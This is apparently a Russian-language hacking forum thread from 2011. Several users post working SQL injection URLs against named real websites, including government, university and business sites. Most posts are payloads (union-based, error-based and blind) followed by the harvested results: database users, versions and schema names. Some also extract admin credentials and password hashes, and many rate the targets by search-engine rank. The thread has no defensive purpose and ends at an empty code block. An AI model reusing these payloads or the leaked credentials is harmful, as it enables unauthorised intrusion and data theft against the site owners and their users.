http://www.supraten.md/ru/contacte.php?menu_id=6&id_contact=-5+union+select+1,column_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fro m+information_schema.columns+where+table_name=0x75 736572--
user: supraten@localhost
database: sablon01
version: 5.0.51b-community-nt-log
Code:
http://www.aviaportal.ru/news.php?newsid=1826+union+select+1,concat_ws(0x0b ,username,passwd),3,4,5+from+user+limit+1,1/*
user: m13977@fhe2.hoster.ru
database: db13977m
version: 4.0.27-log
Code:
http://www.crc.uri.edu/about.php?about_id=-3+union+select+1,2,3,concat%28user%28%29,0x3a,data base%28%29,0x3a,version%28%29%29,5,6--
PR: 6
version: 4.1.22
user: root@winooski.crc.uri.edu
database: crcweb
Code:
http://www.biomatworld.com/about_us.php?about_ID=-1+union+select+1,concat%28user%28%29,0x3a,database %28%29,0x3a,version%28%29%29,3,4,5--
PR: 1
version: 5.1.58
user: biomatwo_cwadmin@localhost
database: biomatwo_cart
Code:
http://www.abrasivesthailand.com/aboutus.php?about_id=-2+union+select+1,2,3,concat(mem_email,0x3a,mem_pas s),5,6,7,8,9,10+from+member+limit+0,1--
PR: 3
version: 5.0.90
user: abrasives@localhost
database: abrasivesthailand
Code:
http://www.armagh.gov.uk/service_details.php?service_id=-5+union+select+1,2,concat%28user%28%29,0x3a,databa se%28%29,0x3a,version%28%29%29,4,5,6,7,8,9,10,11,1 2--
PR: 6
version: 4.0.18
user: armaghcorp@localhost
database: armaghcorp
Code:
http://www.image1inc.ca/category_detail.php?service_id=1&service_name=Window%20Tinting&cat_id=-1+union+select+1,2,3,4,concat%28user%28%29,0x3a,da tabase%28%29,0x3a,version%28%29%29,6--&cat_name=Automotive
PR: 2
version: 5.0.92
user: web_only@my1.rimages.net
database: image1
Code:
http://www.setisnasti.ru/services/note.php?id=-1'+union+select+1,concat_ws(0x3a,parol_login,parol _psw),3+from+parol_table+--+
тИЦ 10
Code:
http://www.lammertpostma.com/notebook/note.php?id=-25'+union+select+1,2,concat_ws(0x3a,ID,user_name,u ser_pass),4+from+accounts+--+
5.1.49-1~bpo50+1
PR 2
Code:
http://www.beskid.com/base/note.php?id=-1465'+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15+--+
5.0.84-log
PR 5
Code:
http://www.eredux.com/states/transportation.php?id=-1128+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52+--+
5.0.92-community
PR 4
Code:
http://www.arvtripeaks.com/transportation.php?id=-28+union+select+1,concat_Ws(0x3a,username,password ),3,4,5,6,7+from+user+--+
5.0.33
PR 4
Code:
http://greetingcardhaven.com/api.php?id=-35+union+select+1,2,concat_ws(0x3a,username,passwo rd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38+from+members+limit+6,1+--+
4.1.22-standard
PR 2
http://www.onlinepetition.ru/sign.php?pUrl=-1'+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20+--+
onlinepe@localhost:4.1.25-log:wwwonlinepetitio
http://www.auto-magnitola.ru/amp/model.php?mode=fffff'+and+1=1+union+select+1,2,con cat_ws(0x3a,user(),version(),database()),4,5,6,7,8 ,9,10,11+--+
musiccar@localhost:5.0.24a:wwwmusiccarru
spherics
08.08.2011, 16:47
Разрабы веб обвязки под эмулятор wow. Вроде двиг сам норм,но вот на сайте бяда.
http://www.web-wow.net/top100.php?ax=out&id=522999999999999999999+union+select+1,concat_ws( 0x3a,version(),user(),database()),3--
webwowne_axe@localhost
5.0.91-community-cll
webwowne_main
http://www.web-wow.net/top100.php?ax=out&id=-522000000000000000000+union+select+1,concat_ws%280 x3a,login,password%29,3+from+accounts--
admin2 f48871733b9daca36611bd69a7ac8e3220713a60
admin 8301316d0d8448a34fa6d0c6bf1cbfa2b4a1a93a
http://www.clickthecity.com/movies/theaters.php?cid='+and+1=1+union+select+1,concat_w s(0x3a,user(),version(),database()),3,4+--+
clickthecity@10.36.10.163:5.1.58-log:CTC_DB
*uNkN0Wn*
09.08.2011, 04:08
PHP:
http://www.liquidhealthinc.com/prodInterior.php?prodID=-32'+union+select+1,concat(database(),char(59),vers ion(),char(59),user()),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19+--+
VERSION : 5.1.53-log
DATABASE : liquidhealthdb
USER : liquidhealth@hachiman.dreamhost.com
PR - 3
PHP:
http://www.ematic.us/product_details.php?prodID=-83+union+select+1,concat(database(),char(59),versi on(),char(59),user()),3,4,5,6,7,8+--+
VERSION : 5.0.91-log
DATABASE : db248448044
USER : dbo248448044@74.208.16.202
PR - 4
PHP:
http://slyelectronics.com/productdetails.php?prodID=-184+union+select+1,concat(database(),char(59),vers ion(),char(59),user()),3,4,5+--+
VERSION : 5.0.91-log
DATABASE : slyelectronics
USER : slyelectronics@208.109.181.187
Code:
http://www.amvastgoed.nl/index.php?option=com_project&view=project&project_id=-21+UNION+SELECT%20%20+1,2,3,4,5,6,7,8,9,10,11,conc at_ws%280x3a,user%28%29,version%28%29,database%28% 29%29,13,14,15,16,17,18,19,20,21,22,23,24--
Username: multidev@localhost
Version: 5.0.81Nxs Internet Bv
Database: multidev
Google PR: 5
*uNkN0Wn*
09.08.2011, 13:29
PHP:
http://www.imobilemedic.com/productDescription.php?prodID=-2+union+select+concat(database(),char(59),version( ),char(59),user()),2,3,4,5,6,7,8,9+--+
VERSION : 5.0.91
DATABASE : imobile1_immweb
USER : imobile1_immweb@localhost
PR - 4
PHP:
http://www.mpressbooks.com/profile.php?prodid=-12-988'+union+select+1,2,concat(database(),char(59),v ersion(),char(59),user()),4,5,6,7,8+--+
VERSION : 5.0.51b-log
DATABASE : mpressbooks
USER : webadm@chumley.darkhorse.com
PR - 6
ТиЦ - 100
Radio.tut.by
tut.by - самый крупный белоруский портал.
Code:
http://radio.tut.by/area.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+--+
4.0.27-Max-log
тИЦ 200
PR 5
*uNkN0Wn*
11.08.2011, 15:47
PHP:
http://www.e-arc.com/site/div_summary.php?mem_id=-144'+union+select+1,2,concat(database(),char(59),v ersion(),char(59),user()),4,5,6,7,8,9,10+--+
VERSION : 5.0.67-community
DATABASE : beta_smallfm
USER : beta_smallfm@amc1.e-arc.com
PR - 5
PHP:
http://www.psnwa.org/member/portal/view_profile.php?mem_id=-621+union+select+concat(database(),char(59),versio n(),char(59),user()),2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23+--+
VERSION : 5.1.58-community-log
DATABASE : psnwaorg_memberpsnwaorg
USER : psnwaorg_admin@localhost
PR - 3
сайт парламента Австралии:
PR 7 тИЦ - 120
Уязвимость в клиенте БД MS SQL
Платформа БД:
Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Имя БД:
ROCRWD
Имя Пользователя БД:
rocruser
Таблицы БД:
CowPat_Index
CommitteeInformation
dtproperties
sysconstraints
syssegments
tblCommittee
...
http://www.aph.gov.au/house/committee/report_register/byKeylist.asp?id=1%27+or+1=%28SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+%28%27CowPat_Index%27,%27CommitteeInforma tion%27,%27dtproperties%27,%27sysconstraints%27,%2 7syssegments%27%,%27СЛЕДУЮЩАЯ ТАБЛИЦА%27%29%29--
Путь к уязвимому скрипту
/house/committee/report_register/byKeylist.asp
Эксплойт
_http://www.aph.gov.au/house/committee/report_register/byKeylist.asp?id=1'+or+1=(
SQL INJ
))--
http://www.anhuigov.cn/showproj.php?id=-1404+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,concat_ws%280x3a,us er,host,file_priv%29,26,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40,41,42,43,44,45+from+mysql.user--
root@localhost:5.1.34-community:ahcttest:root:localhost:Y
http://www.golem.es/distribucion/noticias.php?id_noticia=-230+union+select+1,2,unhex%28hex%28version%28%29%2 9%29,4,5,6--
4.1.11-Debian_4sarge8-log
Code:
http://www.kn.kz/smi.php?id=-1+union+select+concat_ws(0x3a,id,user,u_password)+ from+Users_access+--+
5.0.51a-24+lenny4-log
тИЦ 350
PR 3
http://we.e-rubtsovsk.ru/link.php?link=-217+and+1=2+union+select+1,2,@@version,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48+--
5.1.49-1ubuntu8
Code:
http://www.2kaudit.com/smi.php?id=-1190+union+select+1,version(),3+--+
4.0.27-log
2kaudit-ru:2kaudit-ru@fhe15.hoster.ru
тИЦ 475
PR 4
http://www.apca.org.ug/index.php?ty=page&i=107+or%281,2%29=%28select+count%28*%29,concat%28 %28++select+concat%28user(),0x3a,version(),0x3a,da tabase(),0x3a,username,0x3a,password%29+from+users +limit+0,1%29,0x3a,floor%28rand%28%29*2%29%29+from +information_schema.columns+group+by+2+limit+0,1%2 9--
apcadbadmin1@localhost:5.1.44:apca_org_ug
http://www.bwinditrust.ug/content.php?content_id=8&sub_id=7 or(1,2)=(select count(*),concat(( select concat(user(),0x3a,version(),0x3a,database(),0x3a, uname,0x3a,passwd,0x3a,level,0x3a,status) from authuser limit 0,1),0x3a,floor(rand()*2)) from authuser group by 2 limit 0,1)
bwindidbadmin@localhost:5.1.44:bwinditrust_ug
http://www.naro.go.ug/Inventory/naro/display_search_results.php
POST
institution_type=-3+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,us er(),database(),version()),11--&Button2=+++SEARCH++++
narodbadmin@localhost:naro_go_ug:5.1.44
Bio[GOOGLE]rede.pt PR - 4
Эксплойт
http://www.bio[GOOGLE]rede.pt/page.asp?id=2 or 2=(SQLI)--
Имя Пользователя: webbiorede
База Данных: Biorede
Платформа: Microsoft SQL Server 2008 (SP1) - 10.0.2775.0 (X64) Apr 30 2010 14:31:04 Copyright (c) 988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2)
Другие БД на сервере:
master
tempdb
model
msdb
jazzportugal
...
------------------------------------------------------------------------
Jazzportugal.ua.pt PR - 5
Эксплойт
http://www.jazzportugal.ua.pt/web/musicos.asp?l=1 or 1=(SQLI)
Имя Пользователя: webjazz
База Данных: jazzportugal
Все остальное одно и то же так как эти две БД хранятся на одном сервере, но доступа у них друг к другу нет..
Cennarios
14.08.2011, 18:06
Еще один ср**й хостинг
http://www.webconexion.net/documentation/comment.php?article_id=007+or+1+group+by+concat%28 %28select%20host+from+mysql.user+WHERE+User=0x726F 6F74%29,floor%28rand%280%29*2%29%29%20having%20min %280%29--+&action=new
Музыкальный портал с трафом ~90к уников
Инъекция в MySQL 5.1.51
Code:
http://www.bis[туц-туц]ound.com/index.php?name=Topics&op=view&id=-70380+union+select+1,2,3,user_password,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+slaed_users+w here+user_name=%22admin%22
По запросу в Яндексе "куплю мебель" на первом месте
http://www.bymebel.ru/salon.php?idf=aaa%27+union+select+NULL,NULL,versio n%28%29,database%28%29,user%28%29,NULL,NULL,NULL,N ULL,NULL,1,2,3,4,5,6,7,8,9,20,1+--+
udb2653
4.0.26-log
Uwww2653S@localhost
Blind SQL Inj ---PR 5
http://dsor.upb.de/index.php?id=65&empid=-1'+and+substring(@version(),1,1)=5--+
Тип БД:MySQL 5
Имя БД: typo3db
Имя пользователя: dsor@dsor.upb.de
----------------------------------------------------------------------
SQL Inj---PR 5
http://www.startingoutguide.org.uk/employers/28?empid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,,17,18,19,20,21,22,23,24,25,26,27--+
Тип БД: MySQL 5.0.45
Имя БД: sog2010
Имя пользователя: starting@startingoutguide.org.uk
----------------------------------------------------------------------
SQL Inj---PR 6
http://www.dbm.state.md.us/phonebook/IndDetails.asp?EmpID=1%20or%201=@@version
Тип БД:Microsoft SQL Server 2005
COOLBOY007
17.08.2011, 00:18
Code:
http://www.autoland.com.ua/article.php?id=-19+union+select+concat_ws(0x3a,user(),version(),da tabase()),2+--+
User: autoland_xxx@localhost
Version: 5.0.51a-community
Database: autoland_xxx
PR 4
тИЦ 30
Code:
http://www.addinol.de/oilfinder/oil_details.php?id=658 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: berezovski@localhost
Version: 5.0.26
Database: oilfinder1
PR 4
тИЦ 30
Code:
http://www.cdr-forum.de/showdvdanbieter.php?ID=-105+union+select+1,concat_ws(0x3a,user(),version() ,database())+--+
User: p33794567@localhost
Version: 4.0.27-standard
Database: db67865067
PR 4
тИЦ 10
Министерство земельных и имущественных отношений...
Code:
http://mio.bashkortostan.ru/index.php?page=Information&id=1152+union+Select+1,user+from+mysql.user --
version: 4.0.24_Debian-10-log
database: mio
user: root@localhost
PR: 5 / тИЦ: 50
COOLBOY007
17.08.2011, 14:57
Code:
http://www.no2id.net/news/newsletters/newsletter.php?issue=118 and 1=1
User: no2id@localhost
Version: 4.0.24_Debian-10sarge3-log
Database: no2id
[B]PR 6
тИЦ 20
Code:
http://www.balh.co.uk/eventsbooking_form.php?id=77 and 1=1
User: dbo137413126@212.227.109.52
Version: 4.0.27-max-log
Database: db137413126
[B]PR 5
тИЦ 10
Code:
http://www.historytoherstory.org.uk/subject.php?id=287 and 1=1
User: highplace@localhost
Version: 3.23.56
Database: highplacedb
[B]PR 5
тИЦ 10
Code:
http://www.simshare.org.uk/project.php?id=85%20and%201=1
User: ukcle_dbadmin@localhost
Version: 5.1.52
Database: ukcle_oer
[B]PR 4
Cennarios
18.08.2011, 01:58
Срослось
http://www.discovery.org/scripts/viewDB/index.php?command=view&printerFriendly=true&id=-1783+union+select+user%28%29,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16--+
Mickey House
18.08.2011, 06:49
http://www.golfdm.co.uk/site/pages.php?fid=0,13&pp_id=38%20union%20select%201,2%20,3,group_concat% 28acc_id,0x3a,acc_email,0x3a,pword%20%29,5%20from% 20tblaccount--
COOLBOY007
18.08.2011, 13:26
Code:
http://www.regula.ws/index.php?id=57&ml=ru and 1=1
User: regula@localhost
Version: 4.1.18-standard
Database: db_regula
[B]PR 5
тИЦ 30
Code:
http://www.kolesa-spb.ru/tiresitems.php?id=308' and 1=1 and 'x'='x
User: z96996_1@77.221.130.22
Version: 5.1.49-3-log
Database: z96996_1
[B]PR 2
тИЦ 30
Code:
http://g10sms.com/see.php?id=4716 and 1=1
User: gsmscom_jamsheer@127.0.0.1
Version: 5.0.92-community
Database: gsmscom_newsms
[B]PR 4
bloodAngel
18.08.2011, 22:54
Code:
http://si.ras.ru/index.php?pid=%271%27and%28exists%28select%281%29f rom%28users%29w%20here%28ascii%28lower%28substring %28user_id,1,1%29%29%29%29like%2850%29%20%29%29and %271%27%3C%272%27
блинд
тиц 60 Пр 5
ТюмГУ: Научно-методический журнал
Code:
http://perspectives.utmn.ru/?n=4&y=-2004+union+select+1,2,3,4,5,6,7,group_concat%28tab le_name+separator+0x3a%29+from+information_schema. tables+where+table_schema=0x64625f313539+--+
version: 5.5.12
database: db_159
user: dbu_159@localhost
+ PR: 4/10 | тИЦ: 20
ТюмГУ: Тесты (.blind)
Code:
http://tests.utmn.ru/tests.php?gr=72+and+substring(@@version,1,1)=5
P.S. Кто первый доберётся до суперкомпьютера?
Сервер Муниципального заказа города Тюмени
Code:
http://mz.tyumen-city.ru/cgi-bin/konkurs.pl?action=invite&id=-1110024+union+select+1,concat_ws%280x3a,version%28 %29,database%28%29,user%28%29%29,3+--+
version: 4.1.22
database: zakaz1
user: root@localhost
+ PR: 4/10 | тИЦ: 20
MyGreenLife
19.08.2011, 19:52
http://thebreederratings.com/details.php?bid=-10+union+select+1,2,3,4,group_concat(column_name), 6,7,8,9,10,11,12,13,14,15,16,null+from+information _schema.columns+where+table_name=0x616363657373--+
Sss .
COOLBOY007
20.08.2011, 14:00
Code:
http://www.zelfbouw-groenestroom.nl/redir.php?id=165 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: U536277@jenkins.stor
Version: 5.0.91-log
Database: DB5362771
PR 3
Code:
http://www.dogsite.ws/web/r.php?ID=393.9 union all select 1,2,3,4,concat_ws(0x3a,user(),version(),database() ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+--+
User: leo@174.132.181.42
Version: 5.0.67
Database: ds
PR 2
тИЦ 70
Code:
http://www.fursuit.co.uk/category.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/
User: fursuit_fursuit@localhost
Version: 5.0.92-community
Database: fursuit_links1
PR 3
Code:
http://www.fellrunner.org.uk/races.php?id=' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
User: fra@localhost
Version: 5.1.54-1ubuntu4
Database: fra1
PR 4
Code:
http://www.designdeck.co.uk/article_details.php?id=246 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: design_user@localhost
Version: 5.0.92-community
Database: design_db1
PR 3
MyGreenLife
20.08.2011, 15:44
1)
http://www.monarchshockey.com/bio.php?bid=-180+union+select+1,2,3,4,5,6,7,group_concat(column _name),9,10,11,12,13,14,15,16+from+information_sch ema.columns+where+table_name=0x67697665617761795f7 573657273+--+
PR 5
2)
http://thebreederratings.com/details.php?bid=-10+union+select+1,2,3,4,concat(email,0x3a,password ),6,7,8,9,10,11,12,13,14,15,16,null+from+access#
COOLBOY007
20.08.2011, 17:30
Code:
http://www.biochar.org.uk/abstract.php?id=37.9+union+all+select+1,2,3,4,conc at_ws(0x3a,user(),version(),database()),6,7,8,9,10 +--+
User: biocharuser@tenbears.xcalibre.co.uk
Version: 5.0.77
Database: biochar
PR 5
Code:
http://core.materials.ac.uk/search/detail.php?id=2762 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: core_read@pc010019.mat.liv.ac.uk
Version: 5.1.45-community
Database: core1
PR 5
Code:
http://www.huhmagazine.co.uk/view_article.php?id=2215.9+union+all+select+1,conc at_ws(0x3a,user(),version(),database()),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
User: Jack@localhost
Version: 5.0.86
Database: jacklowe_huh
PR 5
http://101vanna.ru/detail.php?id=110&pid=-543+and+1=2+union+select+1,@@version,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29+--
5.0.90
COOLBOY007
21.08.2011, 14:32
Code:
http://www.underwatertimes.com/news.php?article_id=999999.9 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4, 5,6,7+--+
User: underw6_full@localhost
Version: 5.0.92-community
Database: underw6_762521
PR 5
тИЦ 20
Code:
http://www.jpr.org.uk/publications/publication.php?id=138&sid=155 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: jpr@localhost
Version: 5.1.50
Database: jpr31
PR 6
тИЦ 20
Code:
http://www.healthgrid.org/news/index.php?id=32.9+union+all+select+1,concat_ws(0x3 a,user(),version(),database()),3+--+
User: healthgrid@localhost
Version: 5.0.51a-24+lenny5
Database: healthgrid_website
PR 6
тИЦ 10
MyGreenLife
21.08.2011, 23:18
Странно, но пробелы и плюсы у меня упорно нехотели работать ... решил проблему тунсами, можно заменить на плюсы...
http://konditerprom.ru/list/list.php?cid=1)/**/%26%26/*tuns*/(1)like(2)/*tuns*//*!union+select*//*tuns*/1,2,concat(0x3a,version(),0x3a,user(),0x3a,databas e(),0x3a,@@datadir,0x3a,@@basedir,0x3a,@@tmpdir,0x 3a,@@version_compile_os),4,5,6,7,8,9,10--%0d
http://konditerprom.ru/list/list.php?cid=-1)/*tuns*/union/*tuns*/select/*tuns*/1,group_concat(column_name),3,4,5,6,7,8,9,10/*tuns*/from/*tuns*/information_schema.columns/*tuns*/where/*tuns*/table_name=0x7573657273--%0d
тИЦ 80, PR 4, ЯК, DMOZ
Выводится между =>
HTML:
http://www.hotels-in.ru/hotel.php?hid=999999.9+union+all+select+concat(0x3 d3e,unhex(Hex(cast(database()+as+char))),0x3c3d)--
[COLOR="Green"]тИЦ 10, PR 2
HTML:
http://aquatics.ru/accessory.php?aid=999999.9+union+all+select+1,conc at(0x3a29203d3e,unhex(Hex(cast(database()+as+char) )),0x3c3d20283a),NULL,NULL,NULL,NULL,NULL,NULL--
EASYHOMEPOKER
Мб что-нибудь найдете
HTML:
http://easyhomepoker.com/player.php?id=999999.9+union+all+select+1,2,concat (0x3d3e,database(),0x3c3d),NULL,NULL,NULL,NULL--
*uNkN0Wn*
22.08.2011, 15:06
Code:
http://shrs.iupui.edu/about/profile.php?emp_id=-22+union+select+1,concat(database(),char(59),versi on(),char(59),
user())+--+
VERSION : 5.0.83
DATABASE : shrsweb
USER : root@lux2.uits.indiana.edu
PR - 5
Target: http://www.championsseriestennis.com/player.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,c oncat_ws(0x3a,id,username,password
Host IP: 184.168.136.128
Web Server: Apache
DB Server: MySQL
Resp. Time(avg): 867 ms
Current User: gcaparulo2@184.168.193.186
Sql Version: 5.0.91-log
Current DB: gcaparulo2
System User: gcaparulo2@184.168.193.186
Host Name: p3nlhdb5007-07.shr.prod.phx3.secureserver.net
Installation dir: /usr/local/mysql-5.0.91-linux-x86_64-icc-glibc23/
DB User: 'gcaparulo2'@'%'
Data Bases: information_schema
gcaparulo2
PR-5
*uNkN0Wn*
22.08.2011, 20:38
PHP:
http://www.al-mawrid.org/pages/research_detail.php?research_id=-5+union+select+1,concat(database(),char(59),versio n(),char(59),user()),3,4+--+
VERSION : 5.1.55
DATABASE : almaw0_mawrid
USER : almaw0_naveed@localhost
PR - 5
PHP:
http://www.fpl.fs.fed.us/research/highlights/view_research_highlight.php?research_id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),c har(59),version(),char(59),user()),10,11,12,13,14, 15+--+
VERSION : 5.0.51a-3ubuntu5.5
DATABASE : forestproductslaboratorydb
USER : root@localhost
PR - 6
COOLBOY007
22.08.2011, 20:45
Code:
http://kinogallery.com/news/comments.php?id=9641 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: kinogaller_kino@localhost
Version: 5.0.51a-community
Database: kinogaller_kino1
PR 4
тИЦ 140
COOLBOY007
23.08.2011, 23:38
Code:
http://club-edu.tambov.ru/main/methodic/index.php?id=40' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
User: club@localhost
Version: 5.1.30-log
Database: club_methodic1
PR 5
тИЦ 2900
Code:
http://www.desertmuseum.org/center/edu/pp_showclass.php?id=1580 and 1=1
User: webasdm@69.9.3.67
Version: 4.0.18-log
Database: asdmdata
[B]PR 6
тИЦ 20
Code:
http://www.manli.com/products/details.php?id=113.9 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26+--+
User: manlico_web@localhost
Version: 5.0.92-community
Database: manlico_web
PR 4
тИЦ 130
Cennarios
24.08.2011, 20:13
Акция: Интернет без гов*а
http://www.webhostingcanada.com/faq/question.php?mode=read&question=-14+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13 ,14,15--+
nemaniak
25.08.2011, 18:22
labocadellobo.es PR-5
Code:
http://www.labocadellobo.es/laboca/ficha.php?menu_id=1&jera_id=14&page_id=-75+/*!UnIoN*/+/*!SEleCT*/+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,concat_ws(0x3a ,version(),user(),database()),17+--+
Code:
5.0.77:Boca2007@localhost:Boca2007
www.fam.ulusiada.pt PR-6 blind
Code:
http://www.fam.ulusiada.pt/noticias/artigo.php?news_id=1217'+and+5=substring((select+v ersion()),1,1)+--+
(нет редиректа)
theatreinchicago.com PR-5
Code:
http://www.theatreinchicago.com/newswire.php?newsID=-215+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11+--+
Code:
4.0.27-standard:dbo141597383@localhost:db141597383
MyGreenLife
25.08.2011, 23:26
http://autodaynews.ru/cat.php?cid=1+or(1,1)=(select+count(*),concat_ws(0 x3a,(select+concat(user,0x3a,pass)+from+userlist+l imit+0,1),floor(rand()*2))+from+information_schema .tables+group+by+2+limit+1,1)--+
Админка - http://autodaynews.ru/admin/
COOLBOY007
26.08.2011, 14:00
Code:
http://www.tlmshk.edu.hk/news_detail.php?id=204.9'+union+all+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user() ,version(),database()),17,18,19,20,21,22,23,24,25, 26,27,28+and+'x'='x
User: root@localhost
Version: 4.1.22
Database: schweb
PR 4
Code:
http://www.tup.edu.ph/article.php?id=bulletin&bID=9.9+union+all+select+1,concat_ws(0x3a,user(),v ersion(),database()),3,4,5,6+--+
User: root@localhost
Version: 5.0.27-community-nt
Database: tupcms
PR 5
тИЦ 10
Code:
http://languages.uconn.edu/faculty/details.php?id=23.9+union+all+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),versi on(),database()),17,18,19+--+
User: languages@web.uconn.edu
Version: 5.0.26-log
Database: languages
PR 7
тИЦ 400
http://www.abades.es/novedades.php?id_noticia=-250+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8--
5.0.77:abades:abades@localhost
http://pin.primate.wisc.edu/scripts/external.php?link=-2763+union+select+concat_ws(0x3a,version(),databas e(),user()),2,3,4--
5.0.67-login:libadm@saimiri.
Cennarios
27.08.2011, 12:47
www.stanford.com
www.stanford.com
http://www.stanford.com/dept/asianlang/cgi-bin/about/getevent.php?id=-1983+union+select+1,2,3,4,5,6,7,user%28%29--+
Code:
http://www.infovis.net/printMag.php?lang=2&num=-158+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13+--+
5.0.67-Max
тИЦ 10
PR 5
Code:
http://www.petrofinder.com/member_list/member_read.php?num=-5324+union+select+1,2,3,4,5,6,7,version(),9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23
4.0.27-Max
тИЦ 10
PR 5
Code:
http://velosamara.ru/navigator/GoogleMapTreks.php?category_id=-4+union+select+1,version(),3,4,5,6,7--
5.0.77
тИЦ 275
PR 3
Code:
http://www.downingandlahey.com/online_services/obituary.php?id=-3923+union+select+1,version(),3,4--
5.0.91-log
PR 3
Code:
http://www.onlinenews.com.pk/details.php?id=99999999+union+select+1,2,3,version (),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
5.0.45-community-nt
тИЦ 30
PR 5
http://www.baiwanweb.com
http://www.baiwanweb.com/news_view.php?ID=9604+union+select+1,2,3,4,5,6,7+--+
COOLBOY007
27.08.2011, 19:19
Code:
http://www.dole.gov.ph/list_of_holidays.php?id=95 and 1=1
User: dolews_sjksd721@localhost
Version: 5.0.51a-log
Database: dolews_4a351sd
[B]PR 6
тИЦ 10
Code:
http://www.dftqc.gov.np/content.php?id=61.9+union+all+select+1,2,concat_ws (0x3a,user(),version(),database()),4,5,6+--+
User: dftqcgo_mraf@localhost
Version: 5.0.92-50-log
Database: dftqcgo_daft
PR 4
Сайт Державної архітектурно-будівельної інспекції України
Code:
http://dabi.gov.ua/news_text.php?id=563+union+all+select+1,2,concat_w s(0x3a,user(),version(),database()),4,5,6+--+
User: u_dabi@localhost
Version: 5.0.51a-24+lenny5
Database: dabi
PR 4
тИЦ 80
COOLBOY007
28.08.2011, 12:31
The Alaska State Legislature
Code:
http://house.legis.state.ak.us/rep.php?id=123'+union+all+select+1,2,3,4,5,6,7,8,c oncat_ws(0x3a,user(),version(),database()),10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
User: intranet@wwwjnu02.legis.state.ak.us
Version: 5.0.77-log
Database: intranet
PR 5
Code:
http://artcatalog.su/stat.php?id=207' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
User: artcat@localhost
Version: 5.1.50-log
Database: artcatalog1
PR 3
тИЦ 80
«Комітет виборців України» Донецька обласна громадська організація
Code:
